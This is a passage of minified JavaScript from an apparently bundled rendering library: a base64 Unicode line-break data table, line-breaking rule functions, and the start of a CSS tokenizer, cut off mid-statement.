AAQABABQAAQAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAUABQAFAAUABQAFAAKwBQAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQAKwAEAAQAKwAEAAQABAAEAAQAUAArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAeAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwBQACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAB4AHgAeAB4AHgAeAB4AHgAaABoAGgAaAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAKwArACsAKwArACsAKwArACsAKwArAA0AUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsADQANAA0ADQANACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAASABIAEgAQwBDAEMAUABQAFAAUABDAFAAUABQAEgAQwBIAEMAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAASABDAEMAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwAJAAkACQAJAAkACQAJABYAEQArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABIAEMAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwANAA0AKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArAAQABAAEAAQABAANACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAA0ADQANAB4AHgAeAB4AHgAeAFAAUABQAFAADQAeACsAKwArACsAKwArACsAKwArACsASwBLAEsASwBLAEsASwBLAEsASwArAFAAUABQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAANAA0AHgAeACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwAEAFAABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArACsAKwArACsAKwAEAAQABAAEAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAARwBHABUARwAJACsAKwArACsAKwArACsAKwArACsAKwAEAAQAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXACsAKwArACsAKwArACsAKwBXAFcAVwBXAFcAVwBXAFcAVwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUQBRAFEAKwArACsAKwArACsAKwArACsAKwArACsAKwBRAFEAUQBRACsAKwArACsAKwArACsAKwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUAArACsAHgAEAAQADQAEAAQABAAEACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAKwArACsAKwArACsAKwArAB4AHgAeAB4AHgAeAB4AKwArAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAQABAAEAAQABAAeAB4AHgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAB4AHgAEAAQABAAEAAQABAAEAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ABAAEAAQABAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ABAAEAAQAHgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwArACsAKwArAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAKwArACsAKwArACsAKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwBQAFAAKwArAFAAKwArAFAAUAArACsAUABQAFAAUAArAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeACsAUAArAFAAUABQAFAAUABQAFAAKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwBQAFAAUABQACsAKwBQAFAAUABQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQACsAHgAeAFAAUABQAFAAUAArAFAAKwArACsAUABQAFAAUABQAFAAUAArAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAHgBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgBQAFAAUABQAFAAUABQAFAAUABQAFAAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAB4AHgAeAB4AHgAeAB4AHgAeACsAKwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAeAB4AHgAeAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAeAB4AHgAeAB4AHgAeAB4ABAAeAB4AHgAeAB4AHgAeAB4AHgAeAAQAHgAeAA0ADQANAA0AHgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAEAAQABAAEAAQAKwAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAAQABAAEAAQABAAEAAQAKwAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArAAQABAAEAAQABAAEAAQAKwAEAAQAKwAEAAQABAAEAAQAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwAEAAQABAAEAAQABAAEAFAAUABQAFAAUABQAFAAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwBQAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArABsAUABQAFAAUABQACsAKwBQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEACsAKwArACsAKwArACsAKwArAB4AHgAeAB4ABAAEAAQABAAEAAQABABQACsAKwArACsASwBLAEsASwBLAEsASwBLAEsASwArACsAKwArABYAFgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAGgBQAFAAUAAaAFAAUABQAFAAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAeAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwBQAFAAUABQACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwBQAFAAKwBQACsAKwBQACsAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUABQAFAAKwBQACsAUAArACsAKwArACsAKwBQACsAKwArACsAUAArAFAAKwBQACsAUABQAFAAKwBQAFAAKwBQACsAKwBQACsAUAArAFAAKwBQACsAUAArAFAAUAArAFAAKwArAFAAUABQAFAAKwBQAFAAUABQAFAAUABQACsAUABQAFAAUAArAFAAUABQAFAAKwBQACsAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAUABQAFAAKwBQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAeAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8AJQAlACUAHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHgAeAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB4AHgAeACUAJQAlAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlAB4AHgAlACUAJQAlACUAHgAlACUAJQAlACUAIAAgACAAJQAlACAAJQAlACAAIAAgACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACEAIQAhACEAIQAlACUAIAAgACUAJQAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlACUAIAAlACUAJQAlACAAIAAgACUAIAAgACAAJQAlACUAJQAlACUAJQAgACUAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAlAB4AJQAeACUAJQAlACUAJQAgACUAJQAlACUAHgAlAB4AHgAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAgACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACAAIAAgACUAJQAlACAAIAAgACAAIAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeABcAFwAXABUAFQAVAB4AHgAeAB4AJQAlACUAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAgACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAgACUAJQAgACUAJQAlACUAJQAlACUAJQAgACAAIAAgACAAIAAgACAAJQAlACUAJQAlACUAIAAlACUAJQAlACUAJQAlACUAJQAgACAAIAAgACAAIAAgACAAIAAgACUAJQAgACAAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAgACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAlACAAIAAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAgACAAIAAlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAKwArAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwAlACUAJQAlACUAJQAlACUAJQAlACUAVwBXACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAKwAEACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAA=="),_e=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e0;){var _t=_e[--tt];if(Array.isArray(fe)?-1!==fe.indexOf(_t):fe===_t)for(var gt=ge;gt<=_e.length;){var dt;if((dt=_e[++gt])===ce)return!0;if(dt!==me)break}if(_t!==me)break}return!1},Ha=function(fe,ce){for(var ge=fe;ge>=0;){var _e=ce[ge];if(_e!==me)return _e;ge--}return 0},Va=function(fe,ce,ge,_e,je){if(0===ge[_e])return Pt;var tt=_e-1;if(Array.isArray(je)&&!0===je[tt])return Pt;var dt=tt-1,_t=tt+1,gt=ce[tt],kt=dt>=0?ce[dt]:0,Lt=ce[_t];if(2===gt&&3===Lt)return Pt;if(-1!==ei.indexOf(gt))return"!";if(-1!==ei.indexOf(Lt)||-1!==$o.indexOf(Lt))return Pt;if(8===Ha(tt,ce))return"\xf7";if(11===Ho.get(fe[tt])||(gt===zt||gt===pa)&&11===Ho.get(fe[_t])||7===gt||7===Lt||9===gt||-1===[me,Ge,ht].indexOf(gt)&&9===Lt||-1!==[lt,ft,xe,Le,pt].indexOf(Lt)||Ha(tt,ce)===Oe||ha(23,Oe,tt,ce)||ha([lt,ft],Je,tt,ce)||ha(12,12,tt,ce))return Pt;if(gt===me)return"\xf7";if(23===gt||23===Lt)return Pt;if(16===Lt||16===gt)return"\xf7";if(-1!==[Ge,ht,Je].indexOf(Lt)||14===gt||36===kt&&-1!==Ut.indexOf(gt)||gt===pt&&36===Lt||Lt===We||-1!==Qt.indexOf(Lt)&>===$e||-1!==Qt.indexOf(gt)&&Lt===$e||gt===xt&&-1!==[jt,zt,pa].indexOf(Lt)||-1!==[jt,zt,pa].indexOf(gt)&&Lt===st||-1!==Qt.indexOf(gt)&&-1!==ai.indexOf(Lt)||-1!==ai.indexOf(gt)&&-1!==Qt.indexOf(Lt)||-1!==[xt,st].indexOf(gt)&&(Lt===$e||-1!==[Oe,ht].indexOf(Lt)&&ce[_t+1]===$e)||-1!==[Oe,ht].indexOf(gt)&&Lt===$e||gt===$e&&-1!==[$e,pt,Le].indexOf(Lt))return Pt;if(-1!==[$e,pt,Le,lt,ft].indexOf(Lt))for(var Ht=tt;Ht>=0;){if((ui=ce[Ht])===$e)return Pt;if(-1===[pt,Le].indexOf(ui))break;Ht--}if(-1!==[xt,st].indexOf(Lt))for(Ht=-1!==[lt,ft].indexOf(gt)?dt:tt;Ht>=0;){var ui;if((ui=ce[Ht])===$e)return Pt;if(-1===[pt,Le].indexOf(ui))break;Ht--}if(qt===gt&&-1!==[qt,Qn,Jt,Gt].indexOf(Lt)||-1!==[Qn,Jt].indexOf(gt)&&-1!==[Qn,Kt].indexOf(Lt)||-1!==[Kt,Gt].indexOf(gt)&&Lt===Kt||-1!==zo.indexOf(gt)&&-1!==[We,st].indexOf(Lt)||-1!==zo.indexOf(Lt)&>===xt||-1!==Qt.indexOf(gt)&&-1!==Qt.indexOf(Lt)||gt===Le&&-1!==Qt.indexOf(Lt)||-1!==Qt.concat($e).indexOf(gt)&&Lt===Oe&&-1===ii.indexOf(fe[_t])||-1!==Qt.concat($e).indexOf(Lt)&>===ft)return Pt;if(41===gt&&41===Lt){for(var Ki=ge[tt],Ni=1;Ki>0&&41===ce[--Ki];)Ni++;if(Ni%2!=0)return Pt}return gt===zt&&Lt===pa?Pt:"\xf7"},co=function(fe,ce){ce||(ce={lineBreak:"normal",wordBreak:"normal"});var ge=function(fe,ce){void 0===ce&&(ce="strict");var ge=[],_e=[],je=[];return fe.forEach(function(tt,dt){var _t=Ho.get(tt);if(_t>50?(je.push(!0),_t-=50):je.push(!1),-1!==["normal","auto","loose"].indexOf(ce)&&-1!==[8208,8211,12316,12448].indexOf(tt))return _e.push(dt),ge.push(16);if(4===_t||11===_t){if(0===dt)return _e.push(dt),ge.push(Wi);var gt=ge[dt-1];return-1===$t.indexOf(gt)?(_e.push(_e[dt-1]),ge.push(gt)):(_e.push(dt),ge.push(Wi))}return _e.push(dt),31===_t?ge.push("strict"===ce?Je:jt):_t===Bo||29===_t?ge.push(Wi):43===_t?ge.push(tt>=131072&&tt<=196605||tt>=196608&&tt<=262141?jt:Wi):void ge.push(_t)}),[_e,ge,je]}(fe,ce.lineBreak),_e=ge[0],je=ge[1],tt=ge[2];return("break-all"===ce.wordBreak||"break-word"===ce.wordBreak)&&(je=je.map(function(_t){return-1!==[$e,Wi,Bo].indexOf(_t)?jt:_t})),[_e,je,"keep-all"===ce.wordBreak?tt.map(function(_t,gt){return _t&&fe[gt]>=19968&&fe[gt]<=40959}):void 0]},io=function(){function fe(ce,ge,_e,je){this.codePoints=ce,this.required="!"===ge,this.start=_e,this.end=je}return fe.prototype.slice=function(){return C.apply(void 0,this.codePoints.slice(this.start,this.end))},fe}(),ls=function(fe){return fe>=48&&fe<=57},Ll=function(fe){return ls(fe)||fe>=65&&fe<=70||fe>=97&&fe<=102},Vm=function(fe){return 10===fe||9===fe||32===fe},vf=function(fe){return function(fe){return function(fe){return fe>=97&&fe<=122}(fe)||function(fe){return fe>=65&&fe<=90}(fe)}(fe)||function(fe){return fe>=128}(fe)||95===fe},Bs=function(fe){return vf(fe)||ls(fe)||45===fe},Jp=function(fe){return fe>=0&&fe<=8||11===fe||fe>=14&&fe<=31||127===fe},od=function(fe,ce){return 92===fe&&10!==ce},Pc=function(fe,ce,ge){return 45===fe?vf(ce)||od(ce,ge):!!vf(fe)||!(92!==fe||!od(fe,ce))},ec=function(fe,ce,ge){return 43===fe||45===fe?!!ls(ce)||46===ce&&ls(ge):ls(46===fe?ce:fe)},V2=function(fe){var ce=0,ge=1;(43===fe[ce]||45===fe[ce])&&(45===fe[ce]&&(ge=-1),ce++);for(var _e=[];ls(fe[ce]);)_e.push(fe[ce++]);var je=_e.length?parseInt(C.apply(void 0,_e),10):0;46===fe[ce]&&ce++;for(var tt=[];ls(fe[ce]);)tt.push(fe[ce++]);var dt=tt.length,_t=dt?parseInt(C.apply(void 0,tt),10):0;(69===fe[ce]||101===fe[ce])&&ce++;var gt=1;(43===fe[ce]||45===fe[ce])&&(45===fe[ce]&&(gt=-1),ce++);for(var kt=[];ls(fe[ce]);)kt.push(fe[ce++]);var Lt=kt.length?parseInt(C.apply(void 0,kt),10):0;return ge*(je+_t*Math.pow(10,-dt))*Math.pow(10,gt*Lt)},kM={type:2},dc={type:3},vo={type:4},Zp={type:13},B2={type:8},Ud={type:21},Xn={type:9},Af={type:10},e_={type:11},t_={type:12},n0={type:14},mc={type:23},qd={type:1},H2={type:25},Wt={type:24},Ds={type:26},o0={type:27},i_={type:28},yi={type:29},r0={type:31},Uu={type:32},Ot=function(){function fe(){this._value=[]}return fe.prototype.write=function(ce){this._value=this._value.concat(E(ce))},fe.prototype.read=function(){for(var ce=[],ge=this.consumeToken();ge!==Uu;)ce.push(ge),ge=this.consumeToken();return ce},fe.prototype.consumeToken=function(){var ce=this.consumeCodePoint();switch(ce){case 34:return this.consumeStringToken(34);case 35:var ge=this.peekCodePoint(0),_e=this.peekCodePoint(1),je=this.peekCodePoint(2);if(Bs(ge)||od(_e,je)){var tt=Pc(ge,_e,je)?2:1;return{type:5,value:this.consumeName(),flags:tt}}break;case 36:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Zp;break;case 39:return this.consumeStringToken(39);case 40:return kM;case 41:return dc;case 42:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),n0;break;case 43:if(ec(ce,this.peekCodePoint(0),this.peekCodePoint(1)))return this.reconsumeCodePoint(ce),this.consumeNumericToken();break;case 44:return vo;case 45:var _t=ce,gt=this.peekCodePoint(0),kt=this.peekCodePoint(1);if(ec(_t,gt,kt))return this.reconsumeCodePoint(ce),this.consumeNumericToken();if(Pc(_t,gt,kt))return this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();if(45===gt&&62===kt)return this.consumeCodePoint(),this.consumeCodePoint(),Wt;break;case 46:if(ec(ce,this.peekCodePoint(0),this.peekCodePoint(1)))return this.reconsumeCodePoint(ce),this.consumeNumericToken();break;case 47:if(42===this.peekCodePoint(0))for(this.consumeCodePoint();;){var Lt=this.consumeCodePoint();if(42===Lt&&47===(Lt=this.consumeCodePoint()))return this.consumeToken();if(-1===Lt)return this.consumeToken()}break;case 58:return Ds;case 59:return o0;case 60:if(33===this.peekCodePoint(0)&&45===this.peekCodePoint(1)&&45===this.peekCodePoint(2))return this.consumeCodePoint(),this.consumeCodePoint(),H2;break;case 64:var Ht=this.peekCodePoint(0),ui=this.peekCodePoint(1),Ki=this.peekCodePoint(2);if(Pc(Ht,ui,Ki))return{type:7,value:this.consumeName()};break;case 91:return i_;case 92:if(od(ce,this.peekCodePoint(0)))return this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();break;case 93:return yi;case 61:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),B2;break;case 123:return e_;case 125:return t_;case 117:case 85:var Ni=this.peekCodePoint(0),Ui=this.peekCodePoint(1);return 43===Ni&&(Ll(Ui)||63===Ui)&&(this.consumeCodePoint(),this.consumeUnicodeRangeToken()),this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();case 124:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Xn;if(124===this.peekCodePoint(0))return this.consumeCodePoint(),Ud;break;case 126:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Af;break;case-1:return Uu}return Vm(ce)?(this.consumeWhiteSpace(),r0):ls(ce)?(this.reconsumeCodePoint(ce),this.consumeNumericToken()):vf(ce)?(this.reconsumeCodePoint(ce),this.consumeIdentLikeToken()):{type:6,value:C(ce)}},fe.prototype.consumeCodePoint=function(){var ce=this._value.shift();return void 0===ce?-1:ce},fe.prototype.reconsumeCodePoint=function(ce){this._value.unshift(ce)},fe.prototype.peekCodePoint=function(ce){return ce>=this._value.length?-1:this._value[ce]},fe.prototype.consumeUnicodeRangeToken=function(){for(var ce=[],ge=this.consumeCodePoint();Ll(ge)&&ce.length<6;)ce.push(ge),ge=this.consumeCodePoint();for(var _e=!1;63===ge&&ce.length<6;)ce.push(ge),ge=this.consumeCodePoint(),_e=!0;if(_e)return{type:30,start:parseInt(C.apply(void 0,ce.map(function(gt){return 63===gt?48:gt})),16),end:parseInt(C.apply(void 0,ce.map(function(gt){return 63===gt?70:gt})),16)};var dt=parseInt(C.apply(void 0,ce),16);if(45===this.peekCodePoint(0)&&Ll(this.peekCodePoint(1))){this.consumeCodePoint(),ge=this.consumeCodePoint();for(var _t=[];Ll(ge)&&_t.length<6;)_t.push(ge),ge=this.consumeCodePoint();return{type:30,start:dt,end:parseInt(C.apply(void 0,_t),16)}}return{type:30,start:dt,end:dt}},fe.prototype.consumeIdentLikeToken=function(){var ce=this.consumeName();return"url"===ce.toLowerCase()&&40===this.peekCodePoint(0)?(this.consumeCodePoint(),this.consumeUrlToken()):40===this.peekCodePoint(0)?(this.consumeCodePoint(),{type:19,value:ce}):{type:20,value:ce}},fe.prototype.consumeUrlToken=function(){var ce=[];if(this.consumeWhiteSpace(),-1===this.peekCodePoint(0))return{type:22,value:""};var ge=this.peekCodePoint(0);if(39===ge||34===ge){var _e=this.consumeStringToken(this.consumeCodePoint());return 0===_e.type&&(this.consumeWhiteSpace(),-1===this.peekCodePoint(0)||41===this.peekCodePoint(0))?(this.consumeCodePoint(),{type:22,value:_e.value}):(this.consumeBadUrlRemnants(),mc)}for(;;){var je=this.consumeCodePoint();if(-1===je||41===je)return{type:22,value:C.apply(void 0,ce)};if(Vm(je))return this.consumeWhiteSpace(),-1===this.peekCodePoint(0)||41===this.peekCodePoint(0)?(this.consumeCodePoint(),{type:22,value:C.apply(void 0,ce)}):(this.consumeBadUrlRemnants(),mc);if(34===je||39===je||40===je||Jp(je))return this.consumeBadUrlRemnants(),mc;if(92===je){if(!od(je,this.peekCodePoint(0)))return this.consumeBadUrlRemnants(),mc;ce.push(this.consumeEscapedCodePoint())}else ce.push(je)}},fe.prototype.consumeWhiteSpace=function(){for(;Vm(this.peekCodePoint(0));)this.consumeCodePoint()},fe.prototype.consumeBadUrlRemnants=function(){for(;;){var ce=this.consumeCodePoint();if(41===ce||-1===ce)return;od(ce,this.peekCodePoint(0))&&this.consumeEscapedCodePoint()}},fe.prototype.consumeStringSlice=function(ce){for(var _e="";ce>0;){var je=Math.min(5e4,ce);_e+=C.apply(void 0,this._value.splice(0,je)),ce-=je}return this._value.shift(),_e},fe.prototype.consumeStringToken=function(ce){for(var ge="",_e=0;;){var je=this._value[_e];if(-1===je||void 0===je||je===ce)return{type:0,value:ge+=this.consumeStringSlice(_e)};if(10===je)return this._value.splice(0,_e),qd;if(92===je){var tt=this._value[_e+1];-1!==tt&&void 0!==tt&&(10===tt?(ge+=this.consumeStringSlice(_e),_e=-1,this._value.shift()):od(je,tt)&&(ge+=this.consumeStringSlice(_e),ge+=C(this.consumeEscapedCodePoint()),_e=-1))}_e++}},fe.prototype.consumeNumber=function(){var ce=[],ge=4,_e=this.peekCodePoint(0);for((43===_e||45===_e)&&ce.push(this.consumeCodePoint());ls(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());_e=this.peekCodePoint(0);var je=this.peekCodePoint(1);if(46===_e&&ls(je))for(ce.push(this.consumeCodePoint(),this.consumeCodePoint()),ge=8;ls(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());_e=this.peekCodePoint(0),je=this.peekCodePoint(1);var 